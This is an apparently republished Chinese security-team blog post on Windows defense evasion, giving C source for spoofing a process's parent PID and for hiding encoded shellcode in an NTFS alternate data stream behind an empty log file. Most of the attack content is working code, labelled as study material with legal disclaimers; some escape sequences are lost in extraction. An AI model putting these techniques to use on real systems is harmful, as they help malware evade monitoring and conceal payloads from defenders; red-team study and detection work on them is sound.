泛星安全团队第19篇文章
文章内容为学习记录,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
PPID、ads流
一、前言
二、使用ppid欺骗伪造父进程
参考代码:
https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing
int main()
{
STARTUPINFOEXA si;
PROCESS_INFORMATION pi;
SIZE_T attributeSize;
ZeroMemory(&si, sizeof(STARTUPINFOEXA));
HANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, false, 6200);
InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);
si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);
return 0;
}
这里我选择调用windows本身的curl进行下载:
编译执行:
三、利用windows ads流隐藏shellcode
char* pszRead = NULL;
char FSName[1024];
WCHAR* target_stream = L"C:\Windows\temp\FilterList.log:add";
char received[1024];
DWORD bytesOut;
WIN32_FIND_STREAM_DATA stream_data;
ReadWholeFile("encode.txt", (void**)&pszRead);
GetVolumeInformation("C:\", NULL, NULL, NULL, NULL, NULL, FSName, 1024);
if (_stricmp(FSName, "NTFS") == 0) {
HANDLE tFile = CreateFileW(target_stream,
GENERIC_READ | GENERIC_WRITE | FILE_WRITE_ATTRIBUTES,
FILE_SHARE_READ,
NULL,
OPEN_ALWAYS,
FILE_FLAG_SEQUENTIAL_SCAN | FILE_ATTRIBUTE_NORMAL,
NULL);
if (tFile == INVALID_HANDLE_VALUE) {
printf("[!] Could not open file: %srn", target_stream);
return -1;
}
WriteFile(tFile, pszRead, 2121, &bytesOut, NULL);
HANDLE hFind = FindFirstStreamW(target_stream, FindStreamInfoStandard, &stream_data, 0);
if (hFind == INVALID_HANDLE_VALUE) {
printf("[!] Could not find any streams!n");
return -1;
}
while (TRUE) {
if (!FindNextStreamW(hFind, &stream_data))
break;
}
FindClose(hFind);
SetFilePointer(tFile, NULL, NULL, FILE_BEGIN);
ReadFile(tFile, received, sizeof(received), &bytesOut, NULL);
CloseHandle(tFile);
}
else {
printf("Not this time, buddy!n");
}
四、效果
运行程序:
打开创建的FilterList.log文件是空文件,只有创建的FilterList.log:add流文件中才存在我们的数据。
参考:
https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/untitled-1/parent-pid-spoofing
往期回顾
·END·
原文始发于微信公众号(泛星安全团队):windows绕过通信监控及隐藏shellcode
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论